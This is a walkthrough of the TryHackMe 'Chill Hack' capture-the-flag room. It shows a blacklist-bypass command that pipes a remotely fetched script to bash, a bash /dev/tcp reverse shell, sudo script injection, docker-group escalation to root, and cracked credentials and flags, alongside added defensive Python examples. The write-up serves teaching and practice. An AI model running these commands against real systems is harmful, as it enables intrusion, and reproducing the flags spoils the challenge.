Chill Hack

Platform: TryHackMe
URL: https://tryhackme.com/room/chillhack


Initial scans

We first run an nmap scan:
sudo nmap -sV -sC -oN nmap/initital -v 10.10.45.110

We find 3 ports, 21, 22 and 80.

Logging in to the FTP server as anonymous, we find one file, note.txt:

Anurodh told me that there is some filtering on strings being put in the command -- Apaar

A gobuster run against the site gives us a “secret” folder which contains a web shell with a few limitations:

kali@kali:~/thm/chill_hack$ gobuster dir -w /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt -u http://10.10.223.59 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.223.59
[+] Threads:        10
[+] Wordlist:       /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/02/22 16:22:20 Starting gobuster
===============================================================
/images (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/secret (Status: 301)
/server-status (Status: 403)
[ERROR] 2021/02/22 16:25:07 [!] parse http://10.10.223.59/error_log: net/url: invalid control character in URL
Progress: 49365 / 56164 (87.89%)
===============================================================
2021/02/22 16:29:53 Finished
===============================================================

Web shell

Some keywords are being filtered, like bash, ls, sh, php, perl, etc., so we need to get past that somehow.
With the help of the note.txt info we try different things on the “webshell”.
In the end we manage to read the index.php file, so we can peek at how the commands are being filtered:
command=cmd='cat index.php'; $cmd

index.php

<form method="POST">
    <input id="comm" type="text" name="command" placeholder="Command">
    <button>Execute</button>
</form>
<?php
if(isset($_POST['command']))
{
    $cmd = $_POST['command'];
    $store = explode(" ",$cmd);
    $blacklist = array('nc', 'python', 'bash','php','perl','rm','cat','head','tail','python3','more','less','sh','ls');
    for($i=0; $i<count($store); $i++)
    {
        for($j=0; $j<count($blacklist); $j++)
        {
            if($store[$i] == $blacklist[$j])
            {
?>
            <h1 style="color:red;">Are you a hacker?</h1>
            <style>
                body
                {
                    background-image: url('images/FailingMiserableEwe-size_restricted.gif');
                    background-position: center center;
                    background-repeat: no-repeat;
                    background-attachment: fixed;
                    background-size: cover;					
                }
            </style>
<?php
                return;
            }
        }
    }
?>
<h2 style="color:blue;"><?php echo shell_exec($cmd);?></h2>
<style>
    body
    {
        background-image: url('images/blue_boy_typing_nothought.gif');  
        background-position: center center;
        background-repeat: no-repeat;
        background-attachment: fixed;
        background-size: cover;
    }
</style>
<?php
}
?>

Reverse shell

So we see here that the command POST variable is exploded on the space character and each piece is checked against the array of strings.
It has to match exactly though, so we can get around this!
command=curl 10.9.165.12:8000/shell |bash for example won’t match the check: since the explosion happens on the space character, the 3 items here will be:

  • curl
  • 10.9.165.12:8000/shell
  • |bash

None of these are in the list. bash is, but the check requires an exact match, and |bash isn’t one.
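To make the weakness concrete, here is the filter logic from index.php re-implemented in Python as an added example (this is not code from the room or from the writeup), placed beside a hardened version. The blacklist and the three command lines are the page's; the metacharacter set and the small allowlist of permitted programs are my own choices, and a real application would not expose a generic command runner at all.

```python
import shlex

# The blacklist exactly as it appears in the room's index.php
BLACKLIST = {'nc', 'python', 'bash', 'php', 'perl', 'rm', 'cat', 'head',
             'tail', 'python3', 'more', 'less', 'sh', 'ls'}

# Constructed allowlist for the hardened variant (assumption, not from the page)
ALLOWED_COMMANDS = {'whoami', 'id', 'date', 'uptime'}

# Characters that let a single "word" change what the shell actually runs
SHELL_METACHARS = set(';|&$`<>(){}\n\\')


def weak_filter_allows(command: str) -> bool:
    """Re-implementation of the page's PHP check: explode(" ", $cmd) and
    compare each piece for exact equality with a blacklist entry."""
    for token in command.split(" "):
        if token in BLACKLIST:
            return False
    return True


def hardened_filter(command: str):
    """Reject shell metacharacters outright, tokenise the way a shell would,
    and only accept a fixed allowlist of programs. Returns (allowed, reason)."""
    bad = sorted(set(command) & SHELL_METACHARS)
    if bad:
        return False, f"shell metacharacters not permitted: {bad}"
    try:
        argv = shlex.split(command)
    except ValueError as exc:
        return False, f"unparseable command line: {exc}"
    if not argv:
        return False, "empty command"
    if argv[0] not in ALLOWED_COMMANDS:
        return False, f"{argv[0]!r} is not an allowlisted program"
    return True, "ok"


def compare(command: str) -> dict:
    """Run both checks on one command line and report the verdicts."""
    allowed, reason = hardened_filter(command)
    return {"command": command,
            "weak_filter_allows": weak_filter_allows(command),
            "hardened_allows": allowed,
            "reason": reason}


if __name__ == "__main__":
    # The three command lines that appear in the writeup, plus one benign one
    for cmd in ["cat index.php",
                "cmd='cat index.php'; $cmd",
                "curl 10.9.165.12:8000/shell |bash",
                "whoami"]:
        print(compare(cmd))
```

The weak check only ever blocks the plain `cat index.php`; anything that hides the program name inside a variable, glues it to a pipe or otherwise avoids a standalone blacklisted word sails through. The hardened check fails closed on the metacharacters alone and never needs to know the name of the program being smuggled.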

The shell file contains a simple bash /dev/tcp reverse shell.

kali@kali:~/thm/chill_hack$ cd www/
kali@kali:~/thm/chill_hack/www$ cat shell 
bash -i >& /dev/tcp/10.9.165.12/9000 0>&1

And we host it with python3 -m http.server.

And boom! We have a shell on the box!

kali@kali:~/thm/chill_hack$ nc -lvnp 9000
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9000
Ncat: Listening on 0.0.0.0:9000
Ncat: Connection from 10.10.45.110.
Ncat: Connection from 10.10.45.110:34864.
bash: cannot set terminal process group (1064): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/secret$ whoami
whoami
www-data
www-data@ubuntu:/var/www/html/secret$ 

Let’s stabilize the shell a bit:

# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
 
# In Kali
$ stty raw -echo
$ fg (enter twice)
 
# In reverse shell
export TERM=xterm
 
# If you need to change column and row count
stty rows <num> columns <cols>

Files and SQL dump

We quickly find some more files, which also contain DB credentials:
$con = new PDO("mysql:dbname=webportal;host=localhost","root","!@m+her00+@db");
And there is a users table here; hopefully one of these password hashes can be cracked.

mysql> use webportal
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed
mysql> select * from users
    -> ;
+----+-----------+----------+-----------+----------------------------------+
| id | firstname | lastname | username  | password                         |
+----+-----------+----------+-----------+----------------------------------+
|  1 | Anurodh   | Acharya  | Aurick    | 7e53614ced3640d5de23f111806cc4fd |
|  2 | Apaar     | Dahal    | cullapaar | 686216240e5af30df0501e53c789a649 |
+----+-----------+----------+-----------+----------------------------------+
2 rows in set (0.00 sec)

Crackstation to the rescue!

anurodh 7e53614ced3640d5de23f111806cc4fd	md5	masterpassword
apaar   686216240e5af30df0501e53c789a649	md5	dontaskdonttell
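Why did an online lookup service answer instantly? Because the table stores bare MD5 with no salt and no work factor. The following is an added example (not code from the room or the writeup) that confirms that property for the two rows above with hashlib, and shows next to it what a salted, slow PBKDF2 record looks like; the `pbkdf2_sha256$iterations$salt$digest` layout and the iteration count are my own choices.

```python
import hashlib
import hmac
import os
from typing import Optional

# Hashes and cracked plaintexts exactly as recovered in the writeup
RECOVERED = {
    "Aurick":    ("7e53614ced3640d5de23f111806cc4fd", "masterpassword"),
    "cullapaar": ("686216240e5af30df0501e53c789a649", "dontaskdonttell"),
}


def is_unsalted_md5(stored_hash: str, candidate: str) -> bool:
    """True when stored_hash is just md5(candidate): no salt and no work
    factor, which is why a precomputed lookup table can answer instantly."""
    digest = hashlib.md5(candidate.encode()).hexdigest()
    return hmac.compare_digest(digest, stored_hash.lower())


def audit_users(table: dict) -> list:
    """Return the usernames whose stored hash is the bare MD5 of the
    recovered plaintext, i.e. the rows this storage scheme failed to protect."""
    return [user for user, (h, pw) in table.items() if is_unsalted_md5(h, pw)]


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = 200_000) -> str:
    """Salted, deliberately slow PBKDF2-HMAC-SHA256. The record carries its own
    parameters (constructed format) so they can be raised later without
    breaking old rows."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError(f"unsupported scheme {algo!r}")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), digest_hex)


if __name__ == "__main__":
    print("unsalted MD5 rows:", audit_users(RECOVERED))
    # Same password, two records: the salt makes the digests differ, so a
    # single lookup table no longer covers every user with that password.
    first, second = hash_password("masterpassword"), hash_password("masterpassword")
    print(first)
    print(second)
    print("verify:", verify_password("masterpassword", first))
```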

Let’s try to ssh in with these!
Nothing worked :/

Getting local user

Running linpeas we get a few more things to try, like a file we can run as the user apaar: .helpline.sh.
Checking out the file, we see that we can inject commands here!

www-data@ubuntu:/home/apaar$ sudo -l 
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
www-data@ubuntu:/home/apaar$ sudo -u apaar .helpline.sh 
[sudo] password for www-data: 
^Csudo: 1 incorrect password attempt
www-data@ubuntu:/home/apaar$ sudo -u apaar ./.helpline.sh 

Welcome to helpdesk. Feel free to talk to anyone at any time!

Enter the person whom you want to talk with: plzsub
Hello user! I am plzsub,  Please enter your message: /bin/bash
whoami
apaar

And now we have a “permanent” foothold, since we can add our own ssh key to authorized_keys and log in directly!

User flag

We can now get the first flag. woop woop! {USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww}

Getting root user

Let’s run Linpeas again as apaar, and see what it tells us. Nothing new.

After a lot of messing around I get back to the “other” website, which is only running locally.
We have its files in /var/www/files, and checking the apache config we see it runs on port 9001, which linpeas also mentions.
These are the same files the MySQL creds were found in.
Looking at the code a bit more, we see some images displayed after a successful login, with the message Look in the dark! You will find your answer.

Let’s see if the images have something hidden.

kali@kali:~/thm/chill_hack$ steghide extract -sf hacker-with-laptop_23-2147985341.jpg
Enter passphrase:
wrote extracted data to "backup.zip".

And yes, there is a backup.zip hidden in there. The zip is password protected, so let’s ask john if he knows the password.

kali@kali:~/thm/chill_hack$ zip2john backup.zip > backup.zip.hashes
ver 2.0 efh 5455 efh 7875 backup.zip/source_code.php PKZIP Encr: 2b chk, TS_chk, cmplen=554, decmplen=1211, crc=69DC82F3
kali@kali:~/thm/chill_hack$ john backup.zip.hashes --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pass1word        (backup.zip/source_code.php)
1g 0:00:00:00 DONE (2021-02-23 16:39) 100.0g/s 1638Kp/s 1638Kc/s 1638KC/s total90..cocoliso
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Unzip it!

kali@kali:~/thm/chill_hack$ unzip backup.zip 
Archive:  backup.zip
[backup.zip] source_code.php password: 
  inflating: source_code.php         
kali@kali:~/thm/chill_hack$ less source_code.php 

We see a hardcoded password here, base64 encoded.

kali@kali:~/thm/chill_hack$ echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d
!d0ntKn0wmYp@ssw0rdkali@kali:~/thm/chill_hack$ echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d | echo ""

kali@kali:~/thm/chill_hack$ echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d ; echo ""
!d0ntKn0wmYp@ssw0rd
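Base64 does not hide anything, it only stops a plain-text grep for the password from matching. An added example (not code from the room or the writeup) of the check a secret scanner applies to source trees: find long base64 tokens and keep only those that decode to printable text, which rejects most identifiers and hashes that merely look base64-ish. The PHP sample below is constructed for the demonstration; only the encoded blob and the Welcome message come from the page, and the surrounding lines are not the real source_code.php.

```python
import base64
import binascii
import re
import string

# Candidate tokens: base64 alphabet, at least 16 chars, optional padding,
# not glued to other base64 characters on either side
B64_TOKEN = re.compile(r'(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])')
PRINTABLE = set(string.printable) - set("\x0b\x0c")


def decodes_to_text(token: str):
    """Return the decoded string if token is valid base64 whose bytes are all
    printable ASCII, else None."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    if not text or not set(text) <= PRINTABLE:
        return None
    return text


def find_encoded_strings(source: str) -> list:
    """Return (line_number, token, decoded) for every base64 token in the
    source text that decodes to printable text."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for m in B64_TOKEN.finditer(line):
            decoded = decodes_to_text(m.group(0))
            if decoded is not None:
                hits.append((lineno, m.group(0), decoded))
    return hits


# Constructed sample; only the encoded blob and the greeting are from the writeup
SAMPLE_PHP = '''<?php
if (isset($_POST['username']) && isset($_POST['password'])) {
    if ($_POST['username'] === 'Anurodh'
        && base64_encode($_POST['password']) === 'IWQwbnRLbjB3bVlwQHNzdzByZA==') {
        echo "Welcome Anurodh!";
    }
}
?>'''


if __name__ == "__main__":
    for lineno, token, decoded in find_encoded_strings(SAMPLE_PHP):
        print(f"line {lineno}: {token} -> {decoded!r}")
```

Run against a real tree this would be applied per file; the printable-text test is what keeps the output short, since image data and hashes decode to bytes that fail it.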

It also contains this message when the user has logged in successfully: echo "Welcome Anurodh!";
That’s a user on the box too! Let’s see if he reuses passwords, shall we?

apaar@ubuntu:~$ su anurodh
Password:
anurodh@ubuntu:/home/apaar$

We’re in!
From all our linpeas checking earlier on we know that the anurodh user is a member of the docker group.
So it should be as easy as a single command to get root.
Check out GTFOBins https://gtfobins.github.io/gtfobins/docker/#shell for more docker fun :)
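Both privilege steps on this box come down to configuration that a host audit can flag before anyone lands a shell: the NOPASSWD sudo rule pointing at a script inside a user's home directory (the `sudo -l` output above), and docker group membership, which GTFOBins documents as root-equivalent. The following audit helper is an added example (not code from the room or the writeup). The `sudo -l` text is the page's own output; the /etc/group excerpt is constructed, with only the anurodh-to-docker relationship taken from the writeup, and the list of root-equivalent groups is my own choice.

```python
import re

# Groups whose membership is effectively root on a typical Linux host
# (assumption for this example; docker is the one the writeup relies on)
ROOT_EQUIVALENT_GROUPS = {"docker", "lxd", "disk", "sudo", "wheel"}

# Constructed /etc/group excerpt; only anurodh being in docker is from the writeup
SAMPLE_ETC_GROUP = """root:x:0:
adm:x:4:syslog
sudo:x:27:
www-data:x:33:
docker:x:999:anurodh
apaar:x:1001:
anurodh:x:1002:
"""

# Taken verbatim from the writeup's `sudo -l` output
SAMPLE_SUDO_L = r"""Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
"""

# One sudoers rule as `sudo -l` prints it: (runas) TAG: ... command
SUDO_RULE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$')


def root_equivalent_members(etc_group: str) -> dict:
    """Map each root-equivalent group that has members to the list of members."""
    findings = {}
    for line in etc_group.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, _gid, members = line.split(":", 3)
        users = [u for u in members.split(",") if u]
        if name in ROOT_EQUIVALENT_GROUPS and users:
            findings[name] = users
    return findings


def risky_sudo_rules(sudo_l_output: str) -> list:
    """Flag rules that need no password, point into a home directory, or run a
    shell script: whoever controls the script (or its input handling) controls
    what really runs as the target user."""
    flagged = []
    for line in sudo_l_output.splitlines():
        m = SUDO_RULE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()
        cmd = m.group("cmd").strip()
        reasons = []
        if "NOPASSWD:" in m.group("tags"):
            reasons.append("NOPASSWD")
        if cmd.startswith("/home/"):
            reasons.append("command in a home directory")
        if cmd.endswith(".sh"):
            reasons.append("shell script (check for unquoted user input)")
        if reasons:
            flagged.append({"runas": runas, "command": cmd, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    print("root-equivalent group members:", root_equivalent_members(SAMPLE_ETC_GROUP))
    for rule in risky_sudo_rules(SAMPLE_SUDO_L):
        print("risky sudo rule:", rule)
```

On a live host the two inputs would come from /etc/group and from `sudo -l` run as each service account; the point of the example is that neither finding needs the exploit to be demonstrated before it is worth fixing.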

anurodh@ubuntu:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# cd /root
# ls
proof.txt
# cat proof.txt
                                        {ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}


Congratulations! You have successfully completed the challenge.


         ,-.-.     ,----.                                             _,.---._    .-._           ,----.
,-..-.-./  \==\ ,-.--` , \   _.-.      _.-.             _,..---._   ,-.' , -  `. /==/ \  .-._ ,-.--` , \
|, \=/\=|- |==||==|-  _.-` .-,.'|    .-,.'|           /==/,   -  \ /==/_,  ,  - \|==|, \/ /, /==|-  _.-`
|- |/ |/ , /==/|==|   `.-.|==|, |   |==|, |           |==|   _   _\==|   .=.     |==|-  \|  ||==|   `.-.
 \, ,     _|==/==/_ ,    /|==|- |   |==|- |           |==|  .=.   |==|_ : ;=:  - |==| ,  | -/==/_ ,    /
 | -  -  , |==|==|    .-' |==|, |   |==|, |           |==|,|   | -|==| , '='     |==| -   _ |==|    .-'
  \  ,  - /==/|==|_  ,`-._|==|- `-._|==|- `-._        |==|  '='   /\==\ -    ,_ /|==|  /\ , |==|_  ,`-._
  |-  /\ /==/ /==/ ,     //==/ - , ,/==/ - , ,/       |==|-,   _`/  '.='. -   .' /==/, | |- /==/ ,     /
  `--`  `--`  `--`-----`` `--`-----'`--`-----'        `-.`.____.'     `--`--''   `--`./  `--`--`-----``


--------------------------------------------Designed By -------------------------------------------------------
                                        |  Anurodh Acharya |                   
                                        ---------------------                  

                                     Let me know if you liked it.

Twitter                                                                        
        - @acharya_anurodh                                                     
Linkedin                                                                       
        - www.linkedin.com/in/anurodh-acharya-b1937116a                        

Root flag

{ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}